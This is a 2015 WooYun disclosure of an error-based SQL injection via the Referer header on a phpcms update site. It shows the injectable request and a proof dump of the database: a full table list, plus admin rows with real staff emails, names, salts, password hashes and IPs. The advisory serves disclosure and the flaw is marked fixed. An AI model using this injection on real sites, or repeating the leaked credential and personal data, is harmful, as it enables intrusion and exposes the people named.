当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121676

漏洞标题:phpcms某站点MySQL报错注入

相关厂商:phpcms

漏洞作者: lijiejie

提交时间:2015-06-19 19:52

修复时间:2015-08-08 09:22

公开时间:2015-08-08 09:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-19: 细节已通知厂商并且等待厂商处理中
2015-06-24: 厂商已经确认,细节仅向厂商公开
2015-07-04: 细节向核心白帽子及相关领域专家公开
2015-07-14: 细节向普通白帽子公开
2015-07-24: 细节向实习白帽子公开
2015-08-08: 细节向公众公开

简要描述:

phpcms某站点MySQL报错注入

详细说明:

Referer可注入:

GET /index.php HTTP/1.1
Referer: 123*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Cookie: PHPSESSID=qhncam3i8qper9cd21l275k017
Host: update.phpcms.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

漏洞证明:

current user:    'phpcms_cn_user@%'
current database: 'phpcms_cn'
Database: phpcms_cn
[200 tables]
+--------------------------+
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_app_log_day |
| v9_app_log_total |
| v9_appcenter |
| v9_appcenter_data |
| v9_apps |
| v9_apps_content |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_buycar |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_check_email |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_relation |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_developer |
| v9_dianping |
| v9_dianping_data |
| v9_dianping_type |
| v9_down |
| v9_down_data |
| v9_downservers |
| v9_edu |
| v9_edu_data |
| v9_en_down |
| v9_en_down_data |
| v9_en_news |
| v9_en_news_data |
| v9_extend_setting |
| v9_favorite |
| v9_finance |
| v9_friend |
| v9_hits |
| v9_info |
| v9_info_data |
| v9_ipbanned |
| v9_kefu_online |
| v9_kefu_process |
| v9_key |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_license |
| v9_license_logs |
| v9_link |
| v9_linkage |
| v9_log |
| v9_loveit |
| v9_loveit_mylove |
| v9_member |
| v9_member_address |
| v9_member_detail |
| v9_member_en |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_miaosha |
| v9_miaosha_data |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_order |
| v9_order_complaint |
| v9_page |
| v9_pai |
| v9_pai_data |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_record |
| v9_pay_spend |
| v9_pl |
| v9_pl_fee |
| v9_plug |
| v9_plug_data |
| v9_plugin |
| v9_plugin_var |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201403 |
| v9_poster_201404 |
| v9_poster_201405 |
| v9_poster_201406 |
| v9_poster_201407 |
| v9_poster_201408 |
| v9_poster_201409 |
| v9_poster_201410 |
| v9_poster_201411 |
| v9_poster_201412 |
| v9_poster_201501 |
| v9_poster_201502 |
| v9_poster_201503 |
| v9_poster_201504 |
| v9_poster_201505 |
| v9_poster_201506 |
| v9_poster_space |
| v9_product |
| v9_product_data |
| v9_queue |
| v9_release_point |
| v9_score_vote |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_sms_address |
| v9_sms_allowsend_ip |
| v9_sms_app |
| v9_sms_blacklist |
| v9_sms_check_queue |
| v9_sms_group |
| v9_sms_md5 |
| v9_sms_news |
| v9_sms_news_data |
| v9_sms_paylist |
| v9_sms_product |
| v9_sms_receive |
| v9_sms_scene |
| v9_sms_send_queue |
| v9_sms_service_queue_gid |
| v9_sms_service_report |
| v9_sms_tk |
| v9_sms_tpl |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_task |
| v9_task_quote |
| v9_task_stage |
| v9_template |
| v9_template_bak |
| v9_template_data |
| v9_times |
| v9_tuan |
| v9_type |
| v9_update_items |
| v9_update_notice |
| v9_update_referer |
| v9_update_site |
| v9_urlrule |
| v9_video_1 |
| v9_video_1_data |
| v9_visitor |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_xzzd |
| v9_xzzd_data |
| v9_yp_certificate |
| v9_yp_company |
| v9_yp_design |
| v9_yp_design_data |
| v9_yp_guestbook |
| v9_yp_plug |
| v9_yp_plug_data |
| v9_yp_relation |
| v9_yp_template |
| v9_yp_template_data |
+--------------------------+


Database: phpcms_cn
Table: v9_admin
[3 entries]
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+
| roleid | userid | card | email
| encrypt | username | realname | password
| lastloginip | lastlogintime |
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+
| 1 | 1 | CQUHK1tTJ0NJVSArWxwDWCoBH3ItLCdLNlBQIFtYBwBfVnMC | wangdongw
u@ku6.com | z52Jxg | phpcms | <blank> | 710de87fff574e2123ec793e333c1b
ad | 114.251.167.194 | 1302248539 |
| 1 | 102 | <blank> | zhangming
xue@ku6.com | VBqZUE | zhangmingxue | 张明雪 | 0664400c18b3fe8a28336493dc2
91372 | 10.228.132.12 | 1434703129 |
| 1 | 101 | <blank> | mayuhui@k
u6.com | dbtrn6 | mayuhui | 马玉辉 | 66685d46c2547db24c095798047
ef375 | 10.228.132.7 | 1434699380 |
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-24 09:21

厂商回复:

感谢

最新状态:

2015-08-03:已修复。